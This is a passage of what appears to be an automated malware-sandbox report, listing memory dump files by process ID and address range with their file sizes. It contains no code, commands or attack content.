  Filesize: 572KB

• memory/2752-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp
  Filesize: 1.5MB

• memory/2752-104-0x0000000064940000-0x0000000064959000-memory.dmp
  Filesize: 100KB

• memory/2752-69-0x000000006B440000-0x000000006B4CF000-memory.dmp
  Filesize: 572KB

• memory/2752-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp
  Filesize: 1.5MB

• memory/2752-70-0x000000006B440000-0x000000006B4CF000-memory.dmp
  Filesize: 572KB

• memory/2752-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp
  Filesize: 1.5MB

• memory/2752-80-0x0000000064940000-0x0000000064959000-memory.dmp
  Filesize: 100KB

• memory/2752-79-0x000000006494A000-0x000000006494F000-memory.dmp
  Filesize: 20KB

• memory/2752-77-0x000000006B280000-0x000000006B2A6000-memory.dmp
  Filesize: 152KB

• memory/2772-193-0x0000000000A00000-0x0000000000A26000-memory.dmp
  Filesize: 152KB

• memory/2772-199-0x00000000001E0000-0x00000000001E6000-memory.dmp
  Filesize: 24KB

• memory/2772-195-0x00000000001C0000-0x00000000001C6000-memory.dmp
  Filesize: 24KB

• memory/2772-198-0x00000000001D0000-0x00000000001E8000-memory.dmp
  Filesize: 96KB

• memory/2840-312-0x0000000000200000-0x0000000000208000-memory.dmp
  Filesize: 32KB

• memory/2840-311-0x0000000000B40000-0x0000000000B62000-memory.dmp
  Filesize: 136KB

• memory/2924-171-0x0000000000400000-0x00000000004D8000-memory.dmp
  Filesize: 864KB

• memory/2924-243-0x0000000000400000-0x00000000004D8000-memory.dmp
  Filesize: 864KB

• memory/3048-259-0x0000000000400000-0x000000000071A000-memory.dmp
  Filesize: 3.1MB